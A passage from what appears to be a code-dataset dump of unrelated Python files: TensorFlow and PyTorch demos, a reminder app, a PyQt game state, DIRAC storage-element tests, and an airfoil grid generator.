tf.Graph()\n with self_graph.as_default():\n pass\n print(\"tensor1\", tensor1)\n print(\"tensor2\", tensor2)\n print(\"tensor3\", linera_squares)\n #类型的修改\n l_cast = tf.cast(linera_squares, dtype=tf.float32)\n print(\"linera_squares\", linera_squares)\n print(\"l_cast\", l_cast)\n return None\ndef variable_demo():\n #创建变量的演示\n #定义变量\n a = tf.Variable(initial_value=50)\n b = tf.Variable(initial_value=40)\n c = tf.add(a,b)\n print(\"a\", a)\n print(\"b\", b)\n print(\"c\", c)\n #修改命名空间\n with tf.variable_scope(\"hello\"):\n d = tf.Variable(name=\"var\", initial_value=50)\n print(\"d\", d)\n #初始化变量\n init = tf.global_variables_initializer()\n with tf.Session() as sess:\n sess.run(init)\n a_, b_, c_ = sess.run([a, b, c])\n print(\"a_\", a_)\n print(\"b_\", b_)\n print(\"c_\", c_)\nif __name__==\"__main__\":\n # tensor_demo()\n variable_demo()","sub_path":"Tensor.py","file_name":"Tensor.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"352873547","text":"#! /usr/bin/env python3\n\nimport torch\nfrom torch.optim import lr_scheduler\nfrom torch.autograd import Variable\nimport argparse\nfrom torchvision import transforms, models, datasets\nimport argparse\nimport partspose\nimport copy\nimport sys\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"model\")\nparser.add_argument(\"-g\", \"--gpu\", type=int, default=0)\nparser.add_argument(\"-w\", \"--workers\", type=int, default=8)\nparser.add_argument(\"-t\", \"--total-images\", type=int)\nparser.add_argument(\"-b\", \"--batch-size\", type=int, default=32)\nparser.add_argument(\"-p\", \"--prediction-file\")\nparser.add_argument(\"testing_dir\")\nargs = parser.parse_args()\n\ntransform = transforms.Compose([\n transforms.Resize(224),\n transforms.ToTensor(),\n partspose.normalization,\n])\n\ndataset = datasets.ImageFolder(args.testing_dir, transform)\nloader = torch.utils.data.DataLoader(dataset, batch_size=args.batch_size,\n shuffle=False, num_workers=args.workers)\n# image_list = [f for (f, _) in datasets.folder.make_dataset(\n# args.testing_dir, datasets.folder.find_classes(args.testing_dir)[1])]\n\nnet = torch.load(args.model)\nif args.gpu >= 0:\n net = net.cuda(args.gpu)\nnet.train(False)\nrev_classes = {c : i for i, c in enumerate(net.classes)}\nlocal_classes = list(map(float, dataset.classes))\n\ntotal_images = len(dataset) if not args.total_images else args.total_images\n\nprint(f'Evaluating model {args.model}')\n\nok = 0\nok_weak = 0\nprediction_file = (open(args.prediction_file, \"w\")\n if args.prediction_file else None)\nfor i, (inputs, labels) in enumerate(loader):\n print(f\"{i*loader.batch_size}/{len(dataset)}\", end=\"\\r\", file=sys.stderr)\n with torch.no_grad():\n if args.gpu >= 0:\n inputs = Variable(inputs.cuda(args.gpu))\n else:\n inputs = Variable(inputs)\n\n outputs = net(inputs)\n _, preds = torch.max(outputs.data, 1)\n sm = torch.nn.functional.softmax(\n Variable(outputs.data), dim=1).cpu()\n sm = [[(net.classes[j], float(sm[i,j])) for j in range(sm.shape[1])]\n for i in range(sm.shape[0])]\n for p, l, s in zip(preds.cpu(), labels.cpu(), sm):\n if net.classes[p] == local_classes[l]:\n ok += 1\n if abs(net.classes[p] - local_classes[l]) <= 15:\n ok_weak += 1\n # if prediction_file:\n # print(img, \",\".join([f\"{c[0]}:{c[1]}\" for c in s]),\n # sep=\";\", file=prediction_file)\nprint(f\"{len(dataset)}/{len(dataset)}\", file=sys.stderr)\n\nif not prediction_file:\n print(\"Strict: \", ok/total_images*100, \"%\", sep=\"\")\n print(\"Weak: \", ok_weak/total_images*100, \"%\", sep=\"\")\nelse:\n prediction_file.close()\n","sub_path":"mestrado/python/partspose/test_partspose.py","file_name":"test_partspose.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"361172973","text":"#1. Cree un programa que lea los tres ángulos internos de un triángulo y\n# muestre si los ángulos corresponden a un triángulo o no. Use funciones. Haga pruebas de escritorio. \n#Pseudocodigo\n#Variables\n# Real angulo_uno, angulo_dos, angulo_tres\n#Proceso\n#suma_angulos = angulo_uno + angulo_dos + angulo_tres\n#Si suma_angulos == 180\n#Imprimir\n#Si es un triangulo\n#Si no no es un triangulo\n\ndef calcular_triangulo(angulo_uno, angulo_dos, angulo_tres):\n triangulo = angulo_uno + angulo_dos + angulo_tres\n if triangulo == 180:\n print (\"Es un triangulo\")\n else:\n print(\"No es un triangulo\")\n\nangulo_uno = float(input(\"¿Cuál es el ángulo uno del triangulo? \"))\nif angulo_uno < 0:\n print(\"ERROR la edad no puede ser negativa\")\n exit()\nangulo_dos = float(input(\"¿Cuál es el ángulo dos del triangulo? \"))\nif angulo_dos < 0:\n print(\"ERROR la edad no puede ser negativa\")\n exit()\nangulo_tres = float(input(\"¿Cuál es el ángulo tres del triangulo? \"))\nif angulo_tres < 0:\n print(\"ERROR la edad no puede ser negativa\")\n exit()\n\ncalcular_triangulo(angulo_uno, angulo_dos, angulo_tres)\n","sub_path":"Sena/Andre/s4_1_triangulo.py","file_name":"s4_1_triangulo.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"39066405","text":"import datetime\nimport pyttsx3\nimport time\nimport sqlite3\n\n# Connection to sqlite database\nconn = sqlite3.connect(\"reminders.db\")\nc = conn.cursor()\n\nc.execute('''CREATE TABLE IF NOT EXISTS reminders\n\t\t\t (date text, reminderFor text)''')\n\n# Initializing text-to-speech engine\nengine = pyttsx3.init()\n\naddOrNot = input(\"Do you want to add a reminder? \")\nif addOrNot.lower() == \"yes\":\n\ttimeForReminder = input(\"When do you want the reminder to be? \")\n\treminderFor = input(\"What is the reminder for? \")\n\n\ttimeForReminder = timeForReminder.split(\"/\")\n\ttimeForReminder = [int(i) for i in timeForReminder]\n\ttimeForReminder = str(datetime.datetime(timeForReminder[2], timeForReminder[0], timeForReminder[1]).date())\n\n\t# Need to make secure and not use f string\n\tc.execute(\"INSERT INTO reminders VALUES (?, ?)\", (timeForReminder, reminderFor))\n\tconn.commit()\n\n\tengine.say(\"Reminder added\")\n\tengine.runAndWait()\n\tprint(\"Reminder added\")\n\n\tconn.close()\n\nelif addOrNot.lower() == \"no\":\n\ttoday = str(datetime.datetime.now().date())\n\n\tc.execute(\"SELECT * FROM reminders\")\n\treminders = c.fetchall()\n\n\tfor reminder in reminders:\n\t\ttime = reminder[0]\n\t\treminderFor = reminder[1]\n\t\ttime = time.split(\"-\")\n\t\ttime = datetime.datetime(int(time[0]), int(time[1]), int(time[2]))\n\n\t\tif str(time.date()) == today:\n\t\t\tprint(f\"Hey yo you have a reminder for {reminderFor}\")\n\t\t\tengine.say(f\"Hey yo you have a reminder for {reminderFor}\")\n\t\t\tengine.runAndWait()\n\n\tc.execute('''DELETE FROM reminders WHERE ?''', )\n\n\tconn.close()\n\nelse:\n\tengine.say(\"Please say yes or no.\")\n\tengine.runAndWait()\n\tprint(\"Please say yes or no.\")\n","sub_path":"reminderSystem/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"558456950","text":"\"\"\"\nThis setup script allows one to build an executable app from the\ncommand line.\n\nCurrently only support Mac OSX.\n\nUsage:\n python setup.py py2app\n\"\"\"\n\nfrom setuptools import setup\nfrom os import path\nimport OMB\n\nAPP = ['OMB.py']\nDATA_FILES = []\nVERSION = OMB.version\nCOPYRIGHT = \"Copyright 2001724000. Released under the terms of the Artistic Licence/GPL.\"\nPLIST = {'CFBundleGetInfoString':'OSC-MIDI Bridge',\n 'CFBundleVersion':'1.0',\n 'NSHumanReadableCopyright':COPYRIGHT,\n 'CFBundleDisplayName':'OSC-MIDI Bridge',\n }\n\n# Resources\nresourcesAbsPath = path.abspath(\"resources\")\nconfAbsPath = path.abspath(\"conf\")\nRESOURCES = [resourcesAbsPath, confAbsPath]\n\nICONFILE = path.abspath('resources/app.icns')\n\nOPTIONS = {'argv_emulation': False,\n 'plist':PLIST,\n 'resources':RESOURCES,\n 'iconfile':ICONFILE,\n 'includes':['sip']}\n\nsetup(\n version=VERSION,\n app=APP,\n data_files=DATA_FILES,\n licence=\"Artistic Licence/GPL\",\n url=\"http://osc-midi-bridge.googlecode.com\",\n author=\"2001724000\",\n author_email=\"mc07jap@leeds.ac.uk\",\n options={'py2app': OPTIONS},\n setup_requires=['py2app'],\n)\n","sub_path":"OSC MIDI Bridge/src/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"328908907","text":"from GameStates import State\nfrom ItemFader import ItemFader\nfrom PyQt4.QtCore import Qt\nfrom PyQt4.QtGui import (QGraphicsRectItem, QPixmap, QGraphicsPixmapItem,\n QGraphicsTextItem, QGraphicsSimpleTextItem)\n\nclass FailState(State):\n def __init__(self, machine):\n super(FailState, self).__init__(machine)\n self.__score = 0\n self.is_running = False\n self.layer = layer = QGraphicsRectItem()\n layer.setVisible(False)\n layer.setOpacity(0)\n self.fader = ItemFader(layer)\n self.scene.add_item(layer)\n\n if False:\n pixmap = QPixmap(\"rsc/fail.png\")\n self.splash = g = QGraphicsPixmapItem()\n g.setPixmap(pixmap)\n self.__relpos(g)\n g.setParentItem(layer)\n\n self.title = g = QGraphicsSimpleTextItem()\n g.setText(\"Naub Overflow\")\n font = g.font()\n font.setPixelSize(30)\n font.setBold(True)\n g.setFont(font)\n r = g.boundingRect()\n w, h = r.width(), r.height()\n self.__relpos(g, y = -1.33)\n g.setParentItem(layer)\n\n self.name_input = g = QGraphicsTextItem()\n font = g.font()\n font.setPixelSize(20)\n g.setFont(font)\n g.setPlainText('Anony Mous')\n self.__relpos(g)\n g.setTextInteractionFlags(Qt.TextEditorInteraction)\n g.setParentItem(layer)\n\n def callback(e):\n key, text = e.key(), e.text()\n if str(text) in [\"\\r\", \"\\n\"]:\n self.machine.highscore()\n return\n g = self.name_input\n type(g).keyPressEvent(g, e)\n self.__relpos(g)\n \n g.keyPressEvent = callback\n\n def __relpos(self, g, x = -0.5, y = -0.5):\n r = g.boundingRect()\n w, h = r.width(), r.height()\n g.setPos(x * w, y * h)\n\n def enter(self):\n self.__score = self.naubino.score\n\n self.is_running = True\n \n g = self.name_input\n g.setPlainText('Anony Mous')\n self.__relpos(g)\n g.setFocus()\n \n self.fader.fade_in()\n naubino = self.scene.naubino\n naubs = naubino.naubs[:]\n for naub in naubs: naub.remove()\n\n def leave(self):\n if not self.is_running: return\n self.is_running = False\n name, score = self.name_input.toPlainText(), self.__score\n self.scene.highscore.submit_score(name, score)\n self.fader.fade_out()\n","sub_path":"src/FailState.py","file_name":"FailState.py","file_ext":"py","file_size_in_byte":2453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"42570538","text":"\"\"\"\nTest upload/replication/download/removal for different StorageElements\n\"\"\"\nfrom __future__ import print_function\nimport filecmp\nimport os\nimport random\nimport shutil\nimport string\nimport subprocess\nimport sys\nimport tempfile\n\nfrom itertools import permutations\n\nimport pytest\n\nfrom DIRAC.Core.Security import ProxyInfo\nfrom DIRAC.Core.Base import Script\n\n# mark all tests in this file as integration tests\npytestmark = pytest.mark.integration # pylint: disable=invalid-name\n\n__RCSID__ = '$Id$'\n\nSTORAGEELEMENTS = ['CERN-DIP-4', 'CERN-SRM', 'CERN-DST-EOS']\nSE_PAIRS = list(permutations(STORAGEELEMENTS, 2))\n\nSE_ARGUMENTS = [(SE, ) for SE in STORAGEELEMENTS]\n\nSE_PAIR_ARGUMENTS = [pytest.param(site1, site2, marks=pytest.mark.timeout(100)) for site1, site2 in SE_PAIRS]\n\n\ndef randomFolder():\n \"\"\" create a random string of 8 characters \"\"\"\n return ''.join(random.SystemRandom().choice(string.ascii_lowercase) for _ in xrange(8))\n\n\ndef assertOperationSuccessful(result, message):\n \"\"\"Check if the DMS operation completed successfully.\n\n Success is indicated by the first line consisting of \"'Failed: {}'\"\n and the second line consisting of \"'Successful': {\" followed by the filename (not checked)\n \"\"\"\n assert result.count(\"'Failed': {}\") == 1 & result.count(\"'Successful': {'\") == 1, message\n\n\ndef removeFileAllowFailing(options):\n \"\"\"Remove the random file from the storage elements, if it exists.\"\"\"\n try:\n subprocess.check_output(['dirac-dms-remove-files', options.lfntestfile] + options.options)\n except subprocess.CalledProcessError:\n sys.exc_clear()\n\n\ndef removeFile(options):\n \"\"\"Remove the random file from the storage elements.\"\"\"\n result = subprocess.check_output(['dirac-dms-remove-files', options.lfntestfile] + options.options)\n assert result.count('Successfully removed 1 files') == 1, 'Removal of random file failed: ' + result\n\n\ndef uploadFile(site, options):\n \"\"\"Upload the local random file to the storage elements.\"\"\"\n try:\n result = subprocess.check_output(['dirac-dms-add-file', '-ddd',\n options.lfntestfile,\n options.localtestfile, site] + options.options)\n assert result.count('Successfully uploaded ') == 1, 'Upload of random file failed'\n except subprocess.CalledProcessError as err:\n assert False, err.output\n\n\ndef replicateTo(site, options):\n \"\"\"Replicate the random file to another storage element and check if it worked.\"\"\"\n try:\n cmd = ['dirac-dms-replicate-lfn', options.lfntestfile, site, '-ddd'] + options.options\n result = subprocess.check_output(cmd)\n assertOperationSuccessful(result, 'Failed replicating file')\n except subprocess.CalledProcessError as err:\n print('Command failed:' % cmd)\n print(err.output)\n assert False\n\n\ndef removeDownloadedFile(options):\n \"\"\"Remove the lfn test file if it exists locally.\"\"\"\n if os.path.exists(options.lfntestfilename):\n try:\n os.unlink(options.lfntestfilename)\n except EnvironmentError as err:\n print('failed to remove lfn', repr(err))\n\n\n@pytest.fixture(scope='module')\ndef proxySetup():\n \"\"\"Ensure dirac commands can be run.\n\n Need to execute parseCommandLIne so we can get the proxy information.\n This fixture is run once for the module.\n \"\"\"\n Script.parseCommandLine()\n\n\n@pytest.fixture\ndef opt(proxySetup):\n \"\"\"Options to be used in the tests.\"\"\"\n user = ProxyInfo.getProxyInfo()['Value']['username']\n\n class Options(object):\n localtestfile = 'testfile'\n lfntestfilename = 'testfile_uploaded.txt'\n lfntestfilepath = '/ilc/user/'\n lfntestfilepath += '%s/%s/setests/%s/' % (user[0], user, randomFolder())\n lfntestfile = os.path.join(lfntestfilepath, lfntestfilename)\n options = ['-o', '/Resources/FileCatalogs/LcgFileCatalog/Status=InActive',\n '-o', '/DIRAC/Setup=ILC-Test',\n ]\n print('Using lfn %s' % lfntestfilepath)\n return Options()\n\n\n@pytest.fixture\ndef randomFile(opt):\n \"\"\"Set up the objects.\"\"\"\n # Check if file exists already\n try:\n subprocess.check_output(['dirac-dms-remove-files', opt.lfntestfile] + opt.options)\n print('WARN Warning: file already existed on SE:', opt.lfntestfile)\n except subprocess.CalledProcessError:\n sys.exc_clear()\n\n # Make temporary dir to run test in\n opt.curdir = os.getcwd()\n opt.tmpdir = tempfile.mkdtemp('', dir='./')\n os.chdir(opt.tmpdir)\n\n # Create testfile with random bits\n with open(opt.localtestfile, 'wb') as fout:\n fout.write(' My random testfile ')\n fout.write(os.urandom(1024 * 1024))\n yield\n # tear down\n removeFileAllowFailing(opt)\n os.chdir(opt.curdir)\n shutil.rmtree(opt.tmpdir)\n\n\n@pytest.mark.parametrize(('site',), SE_ARGUMENTS)\ndef test_storing(randomFile, opt, site):\n \"\"\"Upload the file to a given SE, then retrieve it and check for equality.\"\"\"\n uploadFile(site, opt)\n # get file from SE, check for equivalence\n result = subprocess.check_output(['dirac-dms-get-file', '-ddd', opt.lfntestfile] + opt.options)\n assertOperationSuccessful(result, 'Retrieval of random file from storage element to local failed: ' + result)\n assert filecmp.cmp(opt.localtestfile, opt.lfntestfilename), 'Stored wrong file'\n removeFile(opt)\n\n\n@pytest.mark.parametrize(('site1', 'site2'), SE_PAIR_ARGUMENTS)\ndef test_replication(randomFile, opt, site1, site2):\n \"\"\"Replicate file to other SE, check if it is replicated there.\"\"\"\n uploadFile(site1, opt)\n # Replicate file to SE2, remove replica from SE1, get file, rm from all\n replicateTo(site2, opt)\n\n result = subprocess.check_output(['dirac-dms-remove-replicas', opt.lfntestfile, site1] + opt.options)\n assert result.count('Successfully removed') == 1, 'Failed removing replica of random file: ' + result\n\n result = subprocess.check_output(['dirac-dms-get-file', opt.lfntestfile] + opt.options)\n assertOperationSuccessful(result, 'Retrieval of random file from storage element to local failed: ' + result)\n\n assert filecmp.cmp(opt.localtestfile, opt.lfntestfilename), 'Received wrong file'\n removeDownloadedFile(opt)\n\n\n@pytest.mark.parametrize(('site1', 'site2'), SE_PAIR_ARGUMENTS)\ndef test_removal(randomFile, opt, site1, site2):\n \"\"\"Upload file to SE1, replicate to SE2, remove file and ensure retrieve fails.\"\"\"\n uploadFile(site1, opt)\n replicateTo(site2, opt)\n\n result = subprocess.check_output(['dirac-dms-remove-files', opt.lfntestfile] + opt.options)\n assert result.count('Successfully removed 1 files') == 1, 'Removal of random file failed: ' + result\n\n try:\n result = subprocess.check_output(['dirac-dms-get-file', opt.lfntestfile] + opt.options)\n assert False, 'Get file should not succeed'\n except subprocess.CalledProcessError as err:\n assert err.output.count('ERROR') >= 1, 'File not removed from SE even though it should be: ' + err.output\n","sub_path":"Workflow/Modules/Test/Test_SEs.py","file_name":"Test_SEs.py","file_ext":"py","file_size_in_byte":6798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"225785245","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport math\r\nimport core.PlotMethod as PlotMethod\r\n\r\nN=60\r\nM=60\r\n\r\nx=np.zeros(shape=(M,N))\r\ny=np.zeros(shape=(M,N)) \r\n\r\n#input dara airfoil\r\ndata = pd.read_excel('Airfoil2412 baru.xlsx')\r\nairfoil = data.to_numpy()\r\n\r\nlength=np.int(len(airfoil)) #panjang BC dan FG\r\nlength2=np.int((N-length)/2) #panjang AB CD EF dan HG\r\n\r\ntheta=np.linspace(3/2*np.pi,1/2*np.pi,length) #definisi sudut\r\n\r\nfor i in range(length): #mendefinisikan titik dari BC sebagai titik airfoil\r\n x[0,length2+i]=airfoil[i,0]\r\n y[0,length2+i]=airfoil[i,1]\r\n\r\nfor i in range(length): #mendefinisikan titik FG\r\n x[M-1,length2+i]=10*math.cos(theta[i])\r\n y[M-1,length2+i]=10*math.sin(theta[i])\r\n\r\nfor i in range(length2):\r\n x[0,i]=10*(1-i/length2) #titik AB\r\n y[0,i]=0\r\n x[0,length+length2+i]=10*(i+1)/length2 #titik CD\r\n y[0,length+length2+i]=0\r\n \r\n x[M-1,i]=10*(1-i/length2) #titik EF\r\n y[M-1,i]=-10 \r\n x[M-1,length+length2+i]=10*(i+1)/length2 #titik GH\r\n y[M-1,length+length2+i]=10 \r\n \r\n\r\npsi=np.zeros((M-1,N-1))\r\neta=np.zeros((M-1,N-1))\r\n\r\n\r\nfor i in range(M-1):\r\n psi[i,0]=(math.exp(i/M)-1)/(math.exp(1)-1)\r\n#for j in range(N-1):\r\n #eta[0,j]=(math.exp(j/N)-1)/(math.exp(1)-1)\r\n\r\nfor j in range(N-1):\r\n x[j,0]=10 #titik AH\r\n y[j,0]=-10*psi[j,0]\r\n x[j,N-1]=10 #titik DE\r\n y[j,N-1]=10*psi[j,0]\r\n\r\n\r\n#nilai k pada boundary\r\nkB=np.zeros((M-1,1))\r\nkT=np.zeros((M-1,1))\r\nkL=np.zeros((1,N-1))\r\nkR=np.zeros((1,N-1))\r\n\r\nkBtotal=0\r\nkTtotal=0\r\nkLtotal=0\r\nkRtotal=0\r\n\r\nfor i in range(1,M-1): #kBtotal\r\n R = math.sqrt(((x[i,0]-x[i-1,0])**2)+((y[i,0]-y[i-1,0])**2))\r\n kBtotal=kBtotal+R\r\nfor i in range(1,M-1):\r\n R = math.sqrt(((x[i,0]-x[i-1,0])**2)+((y[i,0]-y[i-1,0])**2))\r\n kB[i,0] = kB[i-1,0]+R/kBtotal\r\n\r\nfor i in range(1,M-1): #kTtotal\r\n R = math.sqrt(((x[i,M-1]-x[i-1,M-1])**2+(y[i,M-1]-y[i-1,M-1])**2))\r\n kTtotal=kTtotal+R\r\nfor i in range(1,M-1): \r\n R = math.sqrt(((x[i,M-1]-x[i-1,M-1])**2+(y[i,M-1]-y[i-1,M-1])**2))\r\n kT[i,0]=kT[i-1,0]+R/kTtotal\r\n \r\nfor j in range(1,N-1): #kLtotal\r\n R = math.sqrt(((x[0,j]-x[0,j-1])**2)+((y[0,j]-y[0,j-1])**2))\r\n kLtotal=kLtotal+R\r\nfor j in range(1,N-1): \r\n R = math.sqrt(((x[0,j]-x[0,j-1])**2)+((y[0,j]-y[0,j-1])**2))\r\n kL[0,j] = kL[0,j-1]+R/kLtotal \r\n\r\nfor j in range(1,N-1): #kRtotal\r\n R = math.sqrt(((x[N-1,j]-x[N-1,j-1])**2)+((y[N-1,j]-y[N-1,j-1])**2))\r\n kRtotal=kRtotal+R\r\nfor j in range(1,N-1): \r\n R = math.sqrt(((x[i,N-1]-x[i-1,N-1])**2)+((y[i,N-1]-y[i-1,N-1])**2))\r\n kR[0,j] = kL[0,j-1]+R/kRtotal \r\n\r\n#nilai pada domain\r\nk1=np.zeros((M-1,N-1))\r\nk2=np.zeros((M-1,N-1))\r\n\r\nfor i in range(M-1):\r\n for j in range(N-1):\r\n part1=(1-kL[0,j])*kB[i,0]+kL[0,j]*kT[i,0]\r\n part2=1-((kT[i,0]-kB[i,0])*(kR[0,j]-kL[0,j]))\r\n k1[i,j]=part1/part2\r\n \r\n part1=(1-kB[i,0])*kL[0,j]+kB[i,0]*kR[0,j]\r\n part2=1-((kR[0,j]-kL[0,j])*(kT[i,0]-kB[i,0]))\r\n k2[i,j]=part1/part2\r\n\r\n#TFI \r\nfor i in range(1,M-1):\r\n for j in range(1,N-1):\r\n U=(1-k1[i,j])*x[0,j]+k1[i,j]*x[M-1,j]\r\n V=(1-k2[i,j])*x[i,0]+k2[i,j]*x[i,N-1]\r\n UV=(1-k1[i,j])*(1-k2[i,j])*x[0,0]+k1[i,j]*(1-k2[i,j])*x[M-1,0]+(1-k1[i,j])*k2[i,j]*x[0,N-1]+k1[i,j]*k2[i,j]*(x[M-1,N-1])\r\n x[i,j]=U+V-UV\r\n U=(1-k1[i,j])*y[0,j]+k1[i,j]*y[M-1,j]\r\n V=(1-k2[i,j])*y[i,0]+k2[i,j]*y[i,N-1]\r\n UV=(1-k1[i,j])*(1-k2[i,j])*y[0,0]+k1[i,j]*(1-k2[i,j])*y[M-1,0]+(1-k1[i,j])*k2[i,j]*y[0,N-1]+k1[i,j]*k2[i,j]*(y[M-1,N-1])\r\n y[i,j]=U+V-UV\r\n\"\"\"\r\n#smoothing grid\r\nalpha=np.zeros((M,N))\r\nbeta=np.zeros((M,N))\r\ngamma=np.zeros((M,N))\r\nRx=np.zeros((M,N))\r\nRy=np.zeros((M,N))\r\nw=1.5\r\n#errorx=0\r\n#errory=0\r\nlastRvalue=1\r\niteration=0\r\nerror=1\r\nresidual=[]\r\n\r\n\r\nwhile (error>0.001):\r\n for i in range(1,M-1):\r\n for j in range(1,N-1):\r\n alpha[i,j]=((x[i,j+1]-x[i,j-1])**2+(y[i,j+1]-y[i,j-1])**2)/4\r\n beta[i,j]=(((x[i+1,j]-x[i-1,j])*(x[i,j+1]-x[i,j-1]))+((y[i+1,j]-y[i-1,j])*(y[i,j+1]-y[i,j-1])))/4\r\n gamma[i,j]=((x[i+1,j]-x[i-1,j])**2+(y[i+1,j]-y[i-1,j])**2)/4\r\n\r\n A=alpha[i,j]*(x[i+1,j]-2*x[i,j]+x[i-1,j])\r\n B=(2*beta[i,j]*(x[i+1,j+1]-x[i-1,j+1]-x[i+1,j-1]+x[i-1,j-1]))/4\r\n C=gamma[i,j]*(x[i,j+1]-(2*x[i,j])+x[i,j-1])\r\n \r\n Rx[i,j]=A-B+C\r\n Ry[i,j]=A-B+C\r\n \r\n #update point\r\n x[i,j]=x[i,j]+(w*(Rx[i,j]/(2*(alpha[i,j]+gamma[i,j]))))\r\n y[i,j]=y[i,j]+(w*(Ry[i,j]/(2*(alpha[i,j]+gamma[i,j]))))\r\n \r\n iteration=iteration+1\r\n \r\n currentRvalue=np.sqrt(np.sum(Rx)**2 + np.sum(Ry)**2)\r\n error=abs(lastRvalue-currentRvalue)\r\n \r\n lastRvalue=currentRvalue\r\n\"\"\"\r\nplt.scatter(x,y,s=2)\r\nPlotMethod.plotGrid(x, y)\r\n","sub_path":"tes.py","file_name":"tes.py","file_ext":"py","file_size_in_byte":4765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"179655603","text":"#!/usr/bin/python3\n# -*- coding: UTF-8 -*- \nfrom itertools import combinations\nfrom collections import defaultdict\nimport logging,scipy,gensim.models\nimport calcul_similar,re, copy\nfrom pprint import pprint\n\n\ndef mk_dico_doublons_n4():\n\ttmp = \"\" #stock d'expressions de niveau 4\n\tdico_doublons = {} # { expression: [line_number1, line_number2] }\n\tth_lines=[]\n\twith open('../Resultats/thesaurus-corpus.txt', 'r') as f:\n\t\tfor linum, line in enumerate(f.readlines()):\n\t\t\tline = line.rstrip('\\n')\n\t\t\tth_lines.append(line)\n\t\t\t#print(linum, line)\n\t\t\texpression = line.strip()\n\t\t\tif line.count('\\t') == 4:\n\t\t\t\ttmp += str(linum)+' '+expression+','\n\t\t\t\t#tmp += expression+','\n\t\t\t\tif expression not in dico_doublons:\n\t\t\t\t\tdico_doublons.setdefault(expression,[linum])\n\t\t\t\telse:\n\t\t\t\t\tdico_doublons[expression].append(linum)\n\t\t\telse:\n\t\t\t\ttmp += '\\n'\n\t\tdi = copy.deepcopy(dico_doublons)\n\t\tfor key in di:\n\t\t\tif len(di[key]) < 2:\n\t\t\t\tdel dico_doublons[key]\n\treturn dico_doublons, tmp, th_lines\n\ndico_doublons, niveau4, th_lines = mk_dico_doublons_n4()\nniveau4 = niveau4.split('\\n')\nniveau4 = list(filter(None, niveau4))\n#print(niveau4)\n\nmodel = gensim.models.Word2Vec.load('../Resultats/wv.model')\nsimilar_neg = []\ncpt = 0\n\nsimilar = {} #{sac_expressions_n4: [lignes], moyenne}\nfor t in niveau4:\n\tsac_thesaurus = t.split(',')\n\tsac_thesaurus = list(filter(None, sac_thesaurus))\n\tif len(sac_thesaurus) > 1:\n\t\t#print('----------------------------------------------')\n\t\t#print(sac_thesaurus)\n\t\tsac_lignes = []\n\t\ttermes = []\n\t\tfor el in sac_thesaurus:\n\t\t\tlnum, term = el.split(' ', 1)\n\t\t\tsac_lignes.append(int(lnum))\n\t\t\ttermes.append(term)\n\t\t#print(sac_lignes)\n\t\t# print(termes)\n\t\tts = tuple(termes[:])\n\t\tsimilar.setdefault(ts, [])\n\t\tsimilar[ts].append(sac_lignes)\n\t\tcombine = list(combinations(termes,2))\n\t\tsimi= []\n\t\tfor t1,t2 in combine:\n\t\t\tcpt += 1\n\t\t\ts = calcul_similar.calcul_similarity(calcul_similar.avg_feature_vector(t1.split(),model, num_features=300),calcul_similar.avg_feature_vector(t2.split(),model, num_features=300))\n\t\t\t#print(t1,\"-\",t2,\" : \",s)\n\t\t\t#print(similar)\n\t\t\tif s != \"nan\" and s not in simi:\n\t\t\t\tsimi.append(s)\n\t\tavg = scipy.mean(simi)\n\t\tsimilar[ts].append(avg)\n#pprint(similar)\n\ndico_doublons_new = copy.deepcopy(dico_doublons)\nfor doublon in dico_doublons:\n\t#print('----------------------------------------------')\n\t#print(doublon, dico_doublons[doublon])\n\t#print(dico_doublons[doublon])\n\tlines=[]\n\tavg_simil=[]\n\tfor sacn4 in similar:\n\t\tif doublon in sacn4:\n\t\t\t#print(sacn4)\n\t\t\t#print(similar[sacn4])\n\t\t\tlines.append(similar[sacn4][0])\n\t\t\tavg_simil.append(similar[sacn4][1])\n\tif len(avg_simil) > 0:\n\t\t#print(\"max similarity doublon\")\n\t\t#print(lines)\n\t\t#print(avg_simil)\n\t\tidx_max_simil = avg_simil.index(max(avg_simil))\n\t\t#print(lines[idx_max_simil])\n\t\tmax_sim_doublon = set(dico_doublons[doublon]).intersection(set(lines[idx_max_simil])).pop()\n\t\tdico_doublons_new[doublon].remove(max_sim_doublon)\n\ndelete_lines=[]\nfor value in dico_doublons_new.values():\n\tdelete_lines.extend(value)\n#print(sorted(delete_lines))\n\nwith open('../Resultats/thesaurus-sans-doublons-n4.txt', 'w') as thes:\n\tfor numli, li in enumerate(th_lines):\n\t\tif numli not in delete_lines:\n\t\t\tthes.write(li+\"\\n\")\n\n\n\n\n\n\n\n","sub_path":"StatistiquesApprentissage/2017/Groupes/NidiaXianfan/Scripts/elimine-doublons.py","file_name":"elimine-doublons.py","file_ext":"py","file_size_in_byte":3193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"374548151","text":"# This Python file uses the following encoding: utf-8\nimport pandas as pd \nimport numpy as np \nfrom collections import defaultdict\nimport re\nimport sys\nimport random\nimport matplotlib.pyplot as plt\nfrom random import randint\nimport matplotlib\nimport scipy\nfrom scipy.cluster.hierarchy import dendrogram, linkage \n#from ggplot import *\n# importing data\n#df = pd.read_csv('dating-full.csv', encoding='ISO-8859-1')\npd.set_option('mode.chained_assignment', None) #avoid the warning\ndf = pd.read_csv( sys.argv[1], encoding='ISO-8859-1', header=None)\nnp.random.seed(0)\n#####............(2).................########\nN = df.shape[0]\n\nX = df.values[0:,2:4]\nlabel = df.values[0:,1:2].ravel()\n\nclass_label = np.unique(label)\n\nexamples = []\nfor i in range 